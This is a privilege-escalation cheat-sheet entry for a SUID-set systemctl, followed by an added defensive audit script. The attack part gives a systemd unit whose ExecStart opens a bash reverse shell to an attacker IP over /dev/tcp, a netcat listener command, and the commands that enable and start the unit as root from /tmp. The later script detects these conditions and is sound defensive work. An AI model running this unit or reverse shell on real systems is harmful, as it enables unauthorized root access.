Systemctl
This privilege escalation is possible when systemctl is misconfigured with the SUID bit set, so the binary runs with root privileges no matter which user invokes it.
Create a systemd unit file, for example root.service:
[Unit]
Description=rooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<YOUR IP>/1234 0>&1'
[Install]
WantedBy=multi-user.target
If required, transfer the file to /tmp on the target, for example with wget pulling from a Python web server.
Start a netcat listener before starting the service: nc -nlvp 1234
Register the custom service with systemctl and start it:
$ /bin/systemctl enable /tmp/root.service
$ /bin/systemctl start root
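The defensive counterpart to the steps above, added here as an editor's example and not code from the original page: a POSIX shell audit that reports whether the installed systemctl carries the SUID bit and whether any enabled or linked unit is loaded from a file outside the standard unit directories (a unit enabled from /tmp, as above, is exactly what it flags). The list of trusted directories is my own choice, and the script assumes GNU stat (-c %a) and that systemctl show -p FragmentPath --value returns the resolved path of the unit file.

```shell
#!/bin/sh
# Added defensive audit, not part of the original page: detects the two
# conditions the escalation above relies on, a SUID systemctl binary and an
# enabled unit whose file lives outside the standard unit directories.

# Directories systemd normally loads unit fragments from (assumed list; adjust
# for distributions that use other paths).
TRUSTED_UNIT_DIRS="/etc/systemd/system /run/systemd/system /usr/lib/systemd/system /lib/systemd/system /usr/local/lib/systemd/system"

# mode_has_suid MODE: MODE is an octal permission string as printed by
# 'stat -c %a' (e.g. 4755). Returns 0 when the set-user-ID bit (04000) is set.
mode_has_suid() {
    # Prefixing with 0 makes the shell read the value as octal.
    [ $(( 0$1 & 04000 )) -ne 0 ]
}

# unit_path_is_trusted PATH: returns 0 when PATH is directly inside one of the
# standard unit directories, 1 otherwise (e.g. /tmp/root.service).
unit_path_is_trusted() {
    _dir=$(dirname "$1")
    for _t in $TRUSTED_UNIT_DIRS; do
        [ "$_dir" = "$_t" ] && return 0
    done
    return 1
}

# audit_systemctl_suid: 0 = systemctl present and not SUID, 1 = SUID bit set,
# 2 = systemctl not found (check not applicable on this host).
audit_systemctl_suid() {
    _bin=$(command -v systemctl 2>/dev/null) || return 2
    # GNU coreutils stat; assumed because systemd only runs on GNU/Linux.
    _mode=$(stat -c '%a' "$_bin" 2>/dev/null) || return 2
    if mode_has_suid "$_mode"; then
        echo "WARNING: $_bin is SUID (mode $_mode): any local user can enable and start units as root" >&2
        return 1
    fi
    return 0
}

# audit_enabled_units: prints one line per enabled or linked unit whose
# fragment file is outside the trusted directories. 0 = none found,
# 1 = at least one found, 2 = systemctl unavailable.
audit_enabled_units() {
    command -v systemctl >/dev/null 2>&1 || return 2
    _hits=$(systemctl list-unit-files --state=enabled,linked --no-legend 2>/dev/null |
        while read -r _unit _rest; do
            # FragmentPath is assumed to be the resolved path of the unit file.
            _frag=$(systemctl show -p FragmentPath --value "$_unit" 2>/dev/null)
            [ -n "$_frag" ] || continue
            unit_path_is_trusted "$_frag" || echo "SUSPICIOUS: $_unit is enabled from $_frag"
        done)
    [ -n "$_hits" ] || return 0
    printf '%s\n' "$_hits"
    return 1
}

# When executed directly, run both audits; a check that cannot run is reported
# but is not a finding.
suid_rc=0; units_rc=0
audit_systemctl_suid || suid_rc=$?
audit_enabled_units  || units_rc=$?
if [ "$suid_rc" -eq 2 ] || [ "$units_rc" -eq 2 ]; then
    echo "systemctl not found on this host; audit skipped"
fi
```

Run it as root so systemctl can query unit state for every unit. If the first check fires, the fix is to clear the bit (chmod u-s on the binary) and then review why it was set; anything the second check lists should be treated as unauthorized persistence: disable the unit, remove the file, and establish who wrote it.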